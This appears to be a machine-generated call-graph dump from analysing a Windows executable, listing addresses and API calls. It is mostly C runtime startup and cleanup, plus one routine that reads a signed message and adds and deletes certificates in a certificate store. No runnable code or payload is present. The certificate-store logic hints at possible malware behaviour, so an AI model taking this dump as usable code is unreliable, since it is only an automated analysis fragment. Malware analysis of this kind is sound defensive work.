9a3c93 6688->6689 6689->6686 6693 9a39f8 6690->6693 6696 9a392e 6693->6696 6695 9a3a1c 6695->6686 6697 9a393a ___scrt_is_nonwritable_in_current_image 6696->6697 6704 9a56e2 EnterCriticalSection 6697->6704 6699 9a3948 6705 9a3b40 6699->6705 6701 9a3955 6715 9a3973 6701->6715 6703 9a3966 _abort 6703->6695 6704->6699 6706 9a3b5e 6705->6706 6713 9a3b56 _free 6705->6713 6707 9a3bb7 6706->6707 6708 9a681b 24 API calls 6706->6708 6706->6713 6709 9a681b 24 API calls 6707->6709 6707->6713 6710 9a3bad 6708->6710 6711 9a3bcd 6709->6711 6712 9a4869 _free 15 API calls 6710->6712 6714 9a4869 _free 15 API calls 6711->6714 6712->6707 6713->6701 6714->6713 6718 9a572a LeaveCriticalSection 6715->6718 6717 9a397d 6717->6703 6718->6717 6720 9a3e48 6719->6720 6724 9a3e68 6719->6724 6721 9a47f9 _free 15 API calls 6720->6721 6722 9a3e5e 6721->6722 6723 9a473d _abort 21 API calls 6722->6723 6723->6724 6724->6670 5793 9a1489 5796 9a1853 5793->5796 5795 9a148e 5795->5795 5797 9a1869 5796->5797 5799 9a1872 5797->5799 5800 9a1806 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 5797->5800 5799->5795 5800->5799 6000 9a55ce GetCommandLineA GetCommandLineW 5801 9a3d8f 5802 9a3d9e 5801->5802 5806 9a3db2 5801->5806 5804 9a4869 _free 15 API calls 5802->5804 5802->5806 5803 9a4869 _free 15 API calls 5805 9a3dc4 5803->5805 5804->5806 5807 9a4869 _free 15 API calls 5805->5807 5806->5803 5808 9a3dd7 5807->5808 5809 9a4869 _free 15 API calls 5808->5809 5810 9a3de8 5809->5810 5811 9a4869 _free 15 API calls 5810->5811 5812 9a3df9 5811->5812 6465 9a430f 6466 9a431a 6465->6466 6467 9a432a 6465->6467 6471 9a4330 6466->6471 6470 9a4869 _free 15 API calls 6470->6467 6472 9a4349 6471->6472 6473 9a4343 6471->6473 6475 9a4869 _free 15 API calls 6472->6475 6474 9a4869 _free 15 API calls 6473->6474 6474->6472 6476 9a4355 6475->6476 6477 9a4869 _free 15 API calls 6476->6477 6478 9a4360 6477->6478 6479 9a4869 _free 15 API calls 6478->6479 6480 9a436b 6479->6480 6481 9a4869 _free 15 API calls 6480->6481 6482 9a4376 6481->6482 6483 9a4869 _free 15 API calls 6482->6483 6484 9a4381 6483->6484 6485 9a4869 _free 15 API calls 6484->6485 6486 9a438c 6485->6486 6487 9a4869 _free 15 API calls 6486->6487 6488 9a4397 6487->6488 6489 9a4869 _free 15 API calls 6488->6489 6490 9a43a2 6489->6490 6491 9a4869 _free 15 API calls 6490->6491 6492 9a43b0 6491->6492 6497 9a41f6 6492->6497 6503 9a4102 6497->6503 6499 9a421a 6500 9a4246 6499->6500 6516 9a4163 6500->6516 6502 9a426a 6502->6470 6504 9a410e ___scrt_is_nonwritable_in_current_image 6503->6504 6511 9a56e2 EnterCriticalSection 6504->6511 6507 9a4118 6509 9a4869 _free 15 API calls 6507->6509 6510 9a4142 6507->6510 6508 9a414f _abort 6508->6499 6509->6510 6512 9a4157 6510->6512 6511->6507 6515 9a572a LeaveCriticalSection 6512->6515 6514 9a4161 6514->6508 6515->6514 6517 9a416f ___scrt_is_nonwritable_in_current_image 6516->6517 6524 9a56e2 EnterCriticalSection 6517->6524 6519 9a4179 6520 9a43d9 _free 15 API calls 6519->6520 6521 9a418c 6520->6521 6525 9a41a2 6521->6525 6523 9a419a _abort 6523->6502 6524->6519 6528 9a572a LeaveCriticalSection 6525->6528 6527 9a41ac 6527->6523 6528->6527 5032 9a130d 5033 9a1319 ___scrt_is_nonwritable_in_current_image 5032->5033 5060 9a162b 5033->5060 5035 9a1320 5036 9a1473 5035->5036 5048 9a134a ___scrt_is_nonwritable_in_current_image _abort ___scrt_release_startup_lock 5035->5048 5112 9a191f IsProcessorFeaturePresent 5036->5112 5038 9a147a 5039 9a1480 5038->5039 5116 9a37e1 5038->5116 5119 9a3793 5039->5119 5043 9a1369 5044 9a13ea 5068 9a1a34 5044->5068 5048->5043 5048->5044 5097 9a37a9 5048->5097 5052 9a1405 5103 9a1a6a GetModuleHandleW 5052->5103 5055 9a1410 5056 9a1419 5055->5056 5105 9a3784 5055->5105 5108 9a179c 5056->5108 5061 9a1634 5060->5061 5122 9a1bd4 IsProcessorFeaturePresent 5061->5122 5065 9a1645 5066 9a1649 5065->5066 5132 9a1f7d 5065->5132 5066->5035 5192 9a20b0 5068->5192 5071 9a13f0 5072 9a3457 5071->5072 5194 9a522b 5072->5194 5074 9a13f8 5077 9a1000 6 API calls 5074->5077 5076 9a3460 5076->5074 5198 9a55b6 5076->5198 5078 9a11e3 Sleep 5077->5078 5079 9a1096 CryptMsgGetParam 5077->5079 5080 9a1215 CertCloseStore LocalFree LocalFree LocalFree 5078->5080 5084 9a11f7 5078->5084 5081 9a10bc LocalAlloc 5079->5081 5082 9a1162 CryptMsgGetParam 5079->5082 5080->5052 5085 9a1156 LocalFree 5081->5085 5086 9a10d7 5081->5086 5082->5078 5083 9a1174 CryptMsgGetParam 5082->5083 5083->5078 5089 9a1188 CertFindAttribute CertFindAttribute 5083->5089 5084->5080 5087 9a120a CertDeleteCertificateFromStore 5084->5087 5085->5082 5088 9a10e0 LocalAlloc CryptMsgGetParam 5086->5088 5087->5084 5090 9a113d LocalFree 5088->5090 5091 9a1114 CertCreateCertificateContext 5088->5091 5092 9a11b1 5089->5092 5093 9a11b5 LoadLibraryA GetProcAddress 5089->5093 5090->5088 5096 9a114d 5090->5096 5094 9a1133 CertFreeCertificateContext 5091->5094 5095 9a1126 CertAddCertificateContextToStore 5091->5095 5092->5078 5092->5093 5093->5078 5094->5090 5095->5094 5096->5085 5098 9a37d1 _abort _free 5097->5098 5098->5044 5099 9a4424 _abort 33 API calls 5098->5099 5102 9a3e9a 5099->5102 5100 9a3f24 _abort 33 API calls 5101 9a3ec4 5100->5101 5102->5100 5104 9a140c 5103->5104 5104->5038 5104->5055 5686 9a355e 5105->5686 5107 9a378f 5107->5056 5110 9a17a8 ___scrt_uninitialize_crt 5108->5110 5109 9a1421 5109->5043 5110->5109 5111 9a1f7d ___scrt_uninitialize_crt 7 API calls 5110->5111 5111->5109 5113 9a1935 _abort 5112->5113 5114 9a19e0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5113->5114 5115 9a1a24 _abort 5114->5115 5115->5038 5117 9a355e _abort 23 API calls 5116->5117 5118 9a37f2 5117->5118 5118->5039 5120 9a355e _abort 23 API calls 5119->5120 5121 9a1488 5120->5121 5123 9a1640 5122->5123 5124 9a1f5e 5123->5124 5138 9a24b1 5124->5138 5127 9a1f67 5127->5065 5129 9a1f6f 5130 9a1f7a 5129->5130 5152 9a24ed 5129->5152 5130->5065 5133 9a1f90 5132->5133 5134 9a1f86 5132->5134 5133->5066 5135 9a2496 ___vcrt_uninitialize_ptd 6 API calls 5134->5135 5136 9a1f8b 5135->5136 5137 9a24ed ___vcrt_uninitialize_locks DeleteCriticalSection 5136->5137 5137->5133 5139 9a24ba 5138->5139 5141 9a24e3 5139->5141 5142 9a1f63 5139->5142 5156 9a271d 5139->5156 5143 9a24ed ___vcrt_uninitialize_locks DeleteCriticalSection 5141->5143 5142->5127 5144 9a2463 5142->5144 5143->5142 5173 9a262e 5144->5173 5149 9a2493 5149->5129 5151 9a2478 5151->5129 5153 9a2517 5152->5153 5154 9a24f8 5152->5154 5153->5127 5155 9a2502 DeleteCriticalSection 5154->5155 5155->5153 5155->5155 5161 9a2543 5156->5161 5159 9a2755 InitializeCriticalSectionAndSpinCount 5160 9a2740 5159->5160 5160->5139 5162 9a2560 5161->5162 5163 9a2564 5161->5163 5162->5159 5162->5160 5163->5162 5164 9a25cc GetProcAddress 5163->5164 5166 9a25bd 5163->5166 5168 9a25e3 LoadLibraryExW 5163->5168 5164->5162 5166->5164 5167 9a25c5 FreeLibrary 5166->5167 5167->5164 5169 9a25fa GetLastError 5168->5169 5170 9a262a 5168->5170 5169->5170 5171 9a2605 ___vcrt_FlsGetValue 5169->5171 5170->5163 5171->5170 5172 9a261b LoadLibraryExW 5171->5172 5172->5163 5174 9a2543 ___vcrt_FlsGetValue 5 API calls 5173->5174 5175 9a2648 5174->5175 5176 9a2661 TlsAlloc 5175->5176 5177 9a246d 5175->5177 5177->5151 5178 9a26df 5177->5178 5179 9a2543 ___vcrt_FlsGetValue 5 API calls 5178->5179 5180 9a26f9 5179->5180 5181 9a2714 TlsSetValue 5180->5181 5182 9a2486 5180->5182 5181->5182 5182->5149 5183 9a2496 5182->5183 5184 9a24a6 5183->5184 5185 9a24a0 5183->5185 5184->5151 5187 9a2669 5185->5187 5188 9a2543 ___vcrt_FlsGetValue 5 API calls 5187->5188 5189 9a2683 5188->5189 5190 9a269b TlsFree 5189->5190 5191 9a268f 5189->5191 5190->5191 5191->5184 5193 9a1a47 GetStartupInfoW 5192->5193 5193->5071 5195 9a523d 5194->5195 5196 9a5234 5194->5196 5195->5076 5201 9a512a 5196->5201 5683 9a555d 5198->5683 5221 9a4424 GetLastError 5201->5221 5203 9a5137 5241 9a5249 5203->5241 5205 9a513f 5250 9a4ebe 5205->5250 5208 9a5156 5208->5195 5212 9a518c 5214 9a5194 5212->5214 5216 9a51b1 5212->5216 5272 9a47f9 5214->5272 5217 9a51dd 5216->5217 5218 9a4869 _free 15 API calls 5216->5218 5220 9a5199 5217->5220 5281 9a4d94 5217->5281 5218->5217 5275 9a4869 5220->5275 5222 9a443a 5221->5222 5223 9a4440 5221->5223 5284 9a5904 5222->5284 5227 9a448f SetLastError 5223->5227 5289 9a480c 5223->5289 5227->5203 5228 9a445a 5230 9a4869 _free 15 API calls 5228->5230 5232 9a4460 5230->5232 5231 9a446f 5231->5228 5233 9a4476 5231->5233 5235 9a449b SetLastError 5232->5235 5301 9a4296 5233->5301 5306 9a3f24 5235->5306 5238 9a4869 _free 15 API calls 5240 9a4488 5238->5240 5240->5227 5240->5235 5242 9a5255 ___scrt_is_nonwritable_in_current_image 5241->5242 5243 9a4424 _abort 33 API calls 5242->5243 5244 9a525f 5243->5244 5247 9a52e3 _abort 5244->5247 5248 9a3f24 _abort 33 API calls 5244->5248 5249 9a4869 _free 15 API calls 5244->5249 5542 9a56e2 EnterCriticalSection 5244->5542 5543 9a52da 5244->5543 5247->5205 5248->5244 5249->5244 5547 9a3f72 5250->5547 5253 9a4edf GetOEMCP 5255 9a4f08 5253->5255 5254 9a4ef1 5254->5255 5256 9a4ef6 GetACP 5254->5256 5255->5208 5257 9a62ff 5255->5257 5256->5255 5258 9a633d 5257->5258 5262 9a630d _free 5257->5262 5260 9a47f9 _free 15 API calls 5258->5260 5259 9a6328 HeapAlloc 5261 9a5167 5259->5261 5259->5262 5260->5261 5261->5220 5264 9a52eb 5261->5264 5262->5258 5262->5259 5263 9a6992 _free 2 API calls 5262->5263 5263->5262 5265 9a4ebe 35 API calls 5264->5265 5266 9a530a 5265->5266 5267 9a5311 _ValidateLocalCookies 5266->5267 5268 9a535b IsValidCodePage 5266->5268 5271 9a5380 _abort 5266->5271 5267->5212 5268->5267 5269 9a536d GetCPInfo 5268->5269 5269->5267 5269->5271 5584 9a4f96 GetCPInfo 5271->5584 5273 9a44a8 _free 15 API calls 5272->5273 5274 9a47fe 5273->5274 5274->5220 5276 9a489d _free 5275->5276 5277 9a4874 HeapFree 5275->5277 5276->5208 5277->5276 5278 9a4889 5277->5278 5279 9a47f9 _free 13 API calls 5278->5279 5280 9a488f GetLastError 5279->5280 5280->5276 5647 9a4d51 5281->5647 5283 9a4db8 5283->5220 5317 9a5741 5284->5317 5286 9a592b 5287 9a5943 TlsGetValue 5286->5287 5288 9a5937 _ValidateLocalCookies 5286->5288 5287->5288 5288->5223 5290 9a4819 _free 5289->5290 5291 9a4859 5290->5291 5292 9a4844 HeapAlloc 5290->5292 5330 9a6992 5290->5330 5294 9a47f9 _free 14 API calls 5291->5294 5292->5290 5293 9a4452 5292->5293 5293->5228 5296 9a595a 5293->5296 5294->5293 5297 9a5741 _free 5 API calls 5296->5297 5298 9a5981 5297->5298 5299 9a599c TlsSetValue 5298->5299 5300 9a5990 _ValidateLocalCookies 5298->5300 5299->5300 5300->5231 5344 9a426e 5301->5344 5452 9a6b14 5306->5452 5309 9a3f35 5310 9a3f3e IsProcessorFeaturePresent 5309->5310 5316 9a3f5c 5309->5316 5312 9a3f49 5310->5312 5480 9a4573 5312->5480 5313 9a3793 _abort 23 API calls 5315 9a3f66 5313->5315 5316->5313 5320 9a576d 5317->5320 5322 9a5771 _free 5317->5322 5318 9a5791 5321 9a579d GetProcAddress 5318->5321 5318->5322 5320->5318 5320->5322 5323 9a57dd 5320->5323 5321->5322 5322->5286 5324 9a57fe LoadLibraryExW 5323->5324 5325 9a57f3 5323->5325 5326 9a581b GetLastError 5324->5326 5329 9a5833 5324->5329 5325->5320 5327 9a5826 LoadLibraryExW 5326->5327 5326->5329 5327->5329 5328 9a584a FreeLibrary 5328->5325 5329->5325 5329->5328 5333 9a69d6 5330->5333 5332 9a69a8 _ValidateLocalCookies 5332->5290 5334 9a69e2 ___scrt_is_nonwritable_in_current_image 5333->5334 5339 9a56e2 EnterCriticalSection 5334->5339 5336 9a69ed 5340 9a6a1f 5336->5340 5338 9a6a14 _abort 5338->5332 5339->5336 5343 9a572a LeaveCriticalSection 5340->5343 5342 9a6a26 5342->5338 5343->5342 5350 9a41ae 5344->5350 5346 9a4292 5347 9a421e 5346->5347 5361 9a40b2 5347->5361 5349 9a4242 5349->5238 5351 9a41ba ___scrt_is_nonwritable_in_current_image 5350->5351 5356 9a56e2 EnterCriticalSection 5351->5356 5353 9a41c4 5357 9a41ea 5353->5357 5355 9a41e2 _abort 5355->5346 5356->5353 5360 9a572a LeaveCriticalSection 5357->5360 5359 9a41f4 5359->5355 5360->5359 5362 9a40be ___scrt_is_nonwritable_in_current_image 5361->5362 5369 9a56e2 EnterCriticalSection 5362->5369 5364 9a40c8 5370 9a43d9 5364->5370 5366 9a40e0 5374 9a40f6 5366->5374 5368 9a40ee _abort 5368->5349 5369->5364 5371 9a440f __fassign 5370->5371 5372 9a43e8 __fassign 5370->5372 5371->5366 5372->5371 5377 9a6507 5372->5377 5451 9a572a LeaveCriticalSection 5374->5451 5376 9a4100 5376->5368 5378 9a6587 5377->5378 5381 9a651d 5377->5381 5380 9a4869 _free 15 API calls 5378->5380 5403 9a65d5 5378->5403 5382 9a65a9 5380->5382 5381->5378 5384 9a4869 _free 15 API calls 5381->5384 5399 9a6550 5381->5399 5383 9a4869 _free 15 API calls 5382->5383 5385 9a65bc 5383->5385 5388 9a6545 5384->5388 5390 9a4869 _free 15 API calls 5385->5390 5386 9a4869 _free 15 API calls 5391 9a657c 5386->5391 5387 9a6643 5393 9a4869 _free 15 API calls 5387->5393 5405 9a6078 5388->5405 5389 9a4869 _free 15 API calls 5396 9a6567 5389->5396 5397 9a65ca 5390->5397 5392 9a4869 _free 15 API calls 5391->5392 5392->5378 5398 9a6649 5393->5398 5394 9a4869 15 API calls _free 5404 9a65e3 5394->5404 5433 9a6176 5396->5433 5401 9a4869 _free 15 API calls 5397->5401 5398->5371 5399->5389 5402 9a6572 5399->5402 5401->5403 5402->5386 5445 9a667a 5403->5445 5404->5387 5404->5394 5406 9a6089 5405->5406 5432 9a6172 5405->5432 5407 9a609a 5406->5407 5408 9a4869 _free 15 API calls 5406->5408 5409 9a60ac 5407->5409 5410 9a4869 _free 15 API calls 5407->5410 5408->5407 5411 9a60be 5409->5411 5413 9a4869 _free 15 API calls 5409->5413 5410->5409 5412 9a60d0 5411->5412 5414 9a4869 _free 15 API calls 5411->5414 5415 9a60e2 5412->5415 5416 9a4869 _free 15 API calls 5412->5416 5413->5411 5414->5412 5417 9a60f4 5415->5417 5418 9a4869 _free 15 API calls 5415->5418 5416->5415 5419 9a6106 5417->5419 5421 9a4869 _free 15 API calls 5417->5421 5418->5417 5420 9a6118 5419->5420 5422 9a4869 _free 15 API calls 5419->5422 5423 9a612a 5420->5423 5424 9a4869 _free 15 API calls 5420->5424 5421->5419 5422->5420 5425 9a613c 5423->5425 5426 9a4869 _free 15 API calls 5423->5426 5424->5423 5427 9a4869 _free 15 API calls 5425->5427 5429 9a614e 5425->5429 5426->5425 5427->5429 5428 9a4869 _free 15 API calls 5430 9a6160 5428->5430 5429->5428 5429->5430 5431 9a4869 _free 15 API calls 5430->5431 5430->5432 5431->5432 5432->5399 5434 9a61db 5433->5434 5435 9a6183 5433->5435 5434->5402 5436 9a6193 5435->5436 5437 9a4869 _free 15 API calls 5435->5437 5438 9a61a5 5436->5438 5439 9a4869 _free 15 API calls 5436->5439 5437->5436 5440 9a61b7 5438->5440 5441 9a4869 _free 15 API calls 5438->5441 5439->5438 5442 9a61c9 5440->5442 5443 9a4869 _free 15 API calls 5440->5443 5441->5440 5442->5434 5444 9a4869 _free 15 API calls 5442->5444 5443->5442 5444->5434 5446 9a6687 5445->5446 5450 9a66a5 5445->5450 5447 9a621b __fassign 15 API calls 5446->5447 5446->5450 5448 9a669f 5447->5448 5449 9a4869 _free 15 API calls 5448->5449 5449->5450 5450->5404 5451->5376 5484 9a6a82 5452->5484 5455 9a6b6f 5456 9a6b7b _abort 5455->5456 5460 9a6ba8 _abort 5456->5460 5462 9a6ba2 _abort 5456->5462 5498 9a44a8 GetLastError 5456->5498 5458 9a6bf4 5459 9a47f9 _free 15 API calls 5458->5459 5461 9a6bf9 5459->5461 5466 9a6c20 5460->5466 5520 9a56e2 EnterCriticalSection 5460->5520 5517 9a473d 5461->5517 5462->5458 5462->5460 5465 9a6bd7 _abort 5462->5465 5465->5309 5467 9a6c7f 5466->5467 5473 9a6c77 5466->5473 5477 9a6caa 5466->5477 5521 9a572a LeaveCriticalSection 5466->5521 5467->5477 5522 9a6b66 5467->5522 5470 9a3793 _abort 23 API calls 5470->5467 5473->5470 5474 9a4424 _abort 33 API calls 5478 9a6d0d 5474->5478 5476 9a6b66 _abort 33 API calls 5476->5477 5525 9a6d2f 5477->5525 5478->5465 5479 9a4424 _abort 33 API calls 5478->5479 5479->5465 5481 9a458f _abort 5480->5481 5482 9a45bb IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5481->5482 5483 9a468c _abort _ValidateLocalCookies 5482->5483 5483->5316 5487 9a6a28 5484->5487 5486 9a3f29 5486->5309 5486->5455 5488 9a6a34 ___scrt_is_nonwritable_in_current_image 5487->5488 5493 9a56e2 EnterCriticalSection 5488->5493 5490 9a6a42 5494 9a6a76 5490->5494 5492 9a6a69 _abort 5492->5486 5493->5490 5497 9a572a LeaveCriticalSection 5494->5497 5496 9a6a80 5496->5492 5497->5496 5499 9a44c1 5498->5499 5503 9a44c7 5498->5503 5501 9a5904 _free 6 API calls 5499->5501 5500 9a480c _free 12 API calls 5502 9a44d9 5500->5502 5501->5503 5505 9a44e1 5502->5505 5507 9a595a _free 6 API calls 5502->5507 5503->5500 5504 9a451e SetLastError 5503->5504 5506 9a4527 5504->5506 5508 9a4869 _free 12 API calls 5505->5508 5506->5462 5509 9a44f6 5507->5509 5510 9a44e7 5508->5510 5509->5505 5511 9a44fd 5509->5511 5512 9a4515 SetLastError 5510->5512 5513 9a4296 _free 12 API calls 5511->5513 5512->5506 5514 9a4508 5513->5514 5515 9a4869 _free 12 API calls 5514->5515 5516 9a450e 5515->5516 5516->5504 5516->5512 5529 9a46c2 5517->5529 5519 9a4749 5519->5465 5520->5466 5521->5473 5523 9a4424 _abort 33 API calls 5522->5523 5524 9a6b6b 5523->5524 5524->5476 5526 9a6cfe 5525->5526 5527 9a6d35 5525->5527 5526->5465 5526->5474 5526->5478 5541 9a572a LeaveCriticalSection 5527->5541 5530 9a44a8 _free 15 API calls 5529->5530 5531 9a46d8 5530->5531 5534 9a46e6 _ValidateLocalCookies 5531->5534 5537 9a474d IsProcessorFeaturePresent 5531->5537 5533 9a473c 5535 9a46c2 _abort 21 API calls 5533->5535 5534->5519 5536 9a4749 5535->5536 5536->5519 5538 9a4758 5537->5538 5539 9a4573 _abort 3 API calls 5538->5539 5540 9a476d GetCurrentProcess TerminateProcess 5539->5540 5540->5533 5541->5526 5542->5244 5546 9a572a LeaveCriticalSection 5543->5546 5545 9a52e1 5545->5244 5546->5545 5548 9a3f8f 5547->5548 5554 9a3f85 5547->5554 5549 9a4424 _abort 33 API calls 5548->5549 5548->5554 5550 9a3fb0 5549->5550 5555 9a72d1 5550->5555 5554->5253 5554->5254 5556 9a72e4 5555->5556 5558 9a3fc9 5555->5558 5556->5558 5563 9a6754 5556->5563 5559 9a72fe 5558->5559 5560 9a7326 5559->5560 5561 9a7311 5559->5561 5560->5554 5561->5560 5562 9a5249 __fassign 33 API calls 5561->5562 5562->5560 5564 9a6760 ___scrt_is_nonwritable_in_current_image 5563->5564 5565 9a4424 _abort 33 API calls 5564->5565 5566 9a6769 5565->5566 5567 9a67b7 _abort 5566->5567 5575 9a56e2 EnterCriticalSection 5566->5575 5567->5558 5569 9a6787 5576 9a67cb 5569->5576 5574 9a3f24 _abort 33 API calls 5574->5567 5575->5569 5577 9a679b 5576->5577 5578 9a67d9 __fassign 5576->5578 5580 9a67ba 5577->5580 5578->5577 5579 9a6507 __fassign 15 API calls 5578->5579 5579->5577 5583 9a572a LeaveCriticalSection 5580->5583 5582 9a67ae 5582->5567 5582->5574 5583->5582 5587 9a507a _ValidateLocalCookies 5584->5587 5588 9a4fd0 5584->5588 5586 9a5031 5604 9a7cd1 5586->5604 5587->5267 5592 9a634d 5588->5592 5591 9a7cd1 38 API calls 5591->5587 5593 9a3f72 __fassign 33 API calls 5592->5593 5594 9a636d MultiByteToWideChar 5593->5594 5596 9a63ab 5594->5596 5599 9a6443 _ValidateLocalCookies 5594->5599 5598 9a62ff 16 API calls 5596->5598 5601 9a63cc _abort __alloca_probe_16 5596->5601 5597 9a643d 5609 9a646a 5597->5609 5598->5601 5599->5586 5601->5597 5602 9a6411 MultiByteToWideChar 5601->5602 5602->5597 5603 9a642d GetStringTypeW 5602->5603 5603->5597 5605 9a3f72 __fassign 33 API calls 5604->5605 5606 9a7ce4 5605->5606 5613 9a7ab4 5606->5613 5608 9a5052 5608->5591 5610 9a6487 5609->5610 5611 9a6476 5609->5611 5610->5599 5611->5610 5612 9a4869 _free 15 API calls 5611->5612 5612->5610 5614 9a7acf 5613->5614 5615 9a7af5 MultiByteToWideChar 5614->5615 5616 9a7b1f 5615->5616 5617 9a7ca9 _ValidateLocalCookies 5615->5617 5618 9a62ff 16 API calls 5616->5618 5621 9a7b40 __alloca_probe_16 5616->5621 5617->5608 5618->5621 5619 9a7b89 MultiByteToWideChar 5620 9a7bf5 5619->5620 5622 9a7ba2 5619->5622 5624 9a646a __freea 15 API calls 5620->5624 5621->5619 5621->5620 5638 9a5a15 5622->5638 5624->5617 5625 9a7bb9 5625->5620 5626 9a7bcc 5625->5626 5627 9a7c04 5625->5627 5626->5620 5629 9a5a15 6 API calls 5626->5629 5630 9a62ff 16 API calls 5627->5630 5633 9a7c25 __alloca_probe_16 5627->5633 5628 9a7c9a 5632 9a646a __freea 15 API calls 5628->5632 5629->5620 5630->5633 5631 9a5a15 6 API calls 5634 9a7c79 5631->5634 5632->5620 5633->5628 5633->5631 5634->5628 5635 9a7c88 WideCharToMultiByte 5634->5635 5635->5628 5636 9a7cc8 5635->5636 5637 9a646a __freea 15 API calls 5636->5637 5637->5620 5639 9a5741 _free 5 API calls 5638->5639 5640 9a5a3c 5639->5640 5643 9a5a45 _ValidateLocalCookies 5640->5643 5644 9a5a9d 5640->5644 5642 9a5a85 LCMapStringW 5642->5643 5643->5625 5645 9a5741 _free 5 API calls 5644->5645 5646 9a5ac4 _ValidateLocalCookies 5645->5646 5646->5642 5648 9a4d5d ___scrt_is_nonwritable_in_current_image 5647->5648 5655 9a56e2 EnterCriticalSection 5648->5655 5650 9a4d67 5656 9a4dbc 5650->5656 5654 9a4d80 _abort 5654->5283 5655->5650 5668 9a54dc 5656->5668 5658 9a4e0a 5659 9a54dc 21 API calls 5658->5659 5660 9a4e26 5659->5660 5661 9a54dc 21 API calls 5660->5661 5662 9a4e44 5661->5662 5663 9a4d74 5662->5663 5664 9a4869 _free 15 API calls 5662->5664 5665 9a4d88 5663->5665 5664->5663 5682 9a572a LeaveCriticalSection 5665->5682 5667 9a4d92 5667->5654 5669 9a54ed 5668->5669 5678 9a54e9 5668->5678 5670 9a54f4 5669->5670 5673 9a5507 _abort 5669->5673 5671 9a47f9 _free 15 API calls 5670->5671 5672 9a54f9 5671->5672 5674 9a473d _abort 21 API calls 5672->5674 5675 9a553e 5673->5675 5676 9a5535 5673->5676 5673->5678 5674->5678 5675->5678 5680 9a47f9 _free 15 API calls 5675->5680 5677 9a47f9 _free 15 API calls 5676->5677 5679 9a553a 5677->5679 5678->5658 5681 9a473d _abort 21 API calls 5679->5681 5680->5679 5681->5678 5682->5667 5684 9a3f72 __fassign 33 API calls 5683->5684 5685 9a5571 5684->5685 5685->5076 5687 9a356a _abort 5686->5687 5688 9a3582 5687->5688 5701 9a36b8 GetModuleHandleW 5687->5701 5708 9a56e2 EnterCriticalSection 5688->5708 5695 9a3671 _abort 5695->5107 5696 9a35ff _abort 5712 9a3668 5696->5712 5699 9a358a 5699->5696 5709 9a3c97 5699->5709 5702 9a3576 5701->5702 5702->5688 5703 9a36fc GetModuleHandleExW 5702->5703 5704 9a3726 GetProcAddress 5703->5704 5707 9a373b 5703->5707 5704->5707 5705 9a374f FreeLibrary 5706 9a3758 _ValidateLocalCookies 5705->5706 5706->5688 5707->5705 5707->5706 5708->5699 5723 9a39d0 5709->5723 5743 9a572a LeaveCriticalSection 5712->5743 5714 9a3641 5714->5695 5715 9a3677 5714->5715 5744 9a5b1f 5715->5744 5717 9a3681 5718 9a36a5 5717->5718 5719 9a3685 GetPEB 5717->5719 5721 9a36fc _abort 3 API calls 5718->5721 5719->5718 5720 9a3695 GetCurrentProcess TerminateProcess 5719->5720 5720->5718 5722 9a36ad ExitProcess 5721->5722 5726 9a397f 5723->5726 5725 9a39f4 5725->5696 5727 9a398b ___scrt_is_nonwritable_in_current_image 5726->5727 5734 9a56e2 EnterCriticalSection 5727->5734 5729 9a3999 5735 9a3a20 5729->5735 5731 9a39a6 5739 9a39c4 5731->5739 5733 9a39b7 _abort 5733->5725 5734->5729 5736 9a3a48 5735->5736 5738 9a3a40 _ValidateLocalCookies 5735->5738 5737 9a4869 _free 15 API calls 5736->5737 5736->5738 5737->5738 5738->5731 5742 9a572a LeaveCriticalSection 5739->5742 5741 9a39ce 5741->5733 5742->5741 5743->5714 5745 9a5b3a _ValidateLocalCookies 5744->5745 5746 9a5b44 5744->5746 5745->5717 5747 9a5741 _free 5 API calls 5746->5747 5747->5745 6725 9a324d 6726 9a522b 46 API calls 6725->6726 6727 9a325f 6726->6727 6736 9a561e GetEnvironmentStringsW 6727->6736 6730 9a326a 6732 9a4869 _free 15 API calls 6730->6732 6733 9a329f 6732->6733 6734 9a3275 6735 9a4869 _free 15 API calls 6734->6735 6735->6730 6737 9a5635 6736->6737 6747 9a5688 6736->6747 6740 9a563b WideCharToMultiByte 6737->6740 6738 9a3264 6738->6730 6748 9a32a5 6738->6748 6739 9a5691 FreeEnvironmentStringsW 6739->6738 6741 9a5657 6740->6741 6740->6747 6742 9a62ff 16 API calls 6741->6742 6743 9a565d 6742->6743 6744 9a567a 6743->6744 6745 9a5664 WideCharToMultiByte 6743->6745 6746 9a4869 _free 15 API calls 6744->6746 6745->6744 6746->6747 6747->6738 6747->6739 6749 9a32ba 6748->6749 6750 9a480c _free 15 API calls 6749->6750 6751 9a32e1 6750->6751 6752 9a3345 6751->6752 6755 9a480c _free 15 API calls 6751->6755 6756 9a3347 6751->6756 6761 9a3369 6751->6761 6763 9a4869 _free 15 API calls 6751->6763 6765 9a3eca 6751->6765 6753 9a4869 _free 15 API calls 6752->6753 6754 9a335f 6753->6754 6754->6734 6755->6751 6757 9a3376 15 API calls 6756->6757 6759 9a334d 6757->6759 6760 9a4869 _free 15 API calls 6759->6760 6760->6752 6762 9a474d _abort 6 API calls 6761->6762 6764 9a3375 6762->6764 6763->6751 6766 9a3ee5 6765->6766 6767 9a3ed7 6765->6767 6768 9a47f9 _free 15 API calls 6766->6768 6767->6766 6772 9a3efc 6767->6772 6769 9a3eed 6768->6769 6770 9a473d _abort 21 API calls 6769->6770 6771 9a3ef7 6770->6771 6771->6751 6772->6771 6773 9a47f9 _free 15 API calls 6772->6773 6773->6769 6774 9a1442 6775 9a1a6a GetModuleHandleW 6774->6775 6776 9a144a 6775->6776 6777 9a144e 6776->6777 6778 9a1480 6776->6778 6781 9a1459 6777->6781 6783 9a3775 6777->6783 6779 9a3793 _abort 23 API calls 6778->6779 6782 9a1488 6779->6782 6784 9a355e _abort 23 API calls 6783->6784 6785 9a3780 6784->6785 6785->6781 6001 9a9ec3 6002 9a9ed9 6001->6002 6003 9a9ecd 6001->6003 6003->6002 6004 9a9ed2 CloseHandle 6003->6004 6004->6002 6529 9a3400 6530 9a3418 6529->6530 6531 9a3412 6529->6531 6532 9a3376 15 API calls 6531->6532 6532->6530 6533 9a1e00 6534 9a1e1e ___except_validate_context_record _ValidateLocalCookies __IsNonwritableInCurrentImage 6533->6534 6535 9a1e9e _ValidateLocalCookies 6534->6535 6538 9a2340 RtlUnwind 6534->6538 6537 9a1f27 _ValidateLocalCookies 6538->6537 6786 9a3d41 6789 9a341b 6786->6789 6790 9a342a 6789->6790 6791 9a3376 15 API calls 6790->6791 6792 9a3444 6791->6792 6793 9a3376 15 API calls 6792->6793 6794 9a344f 6793->6794 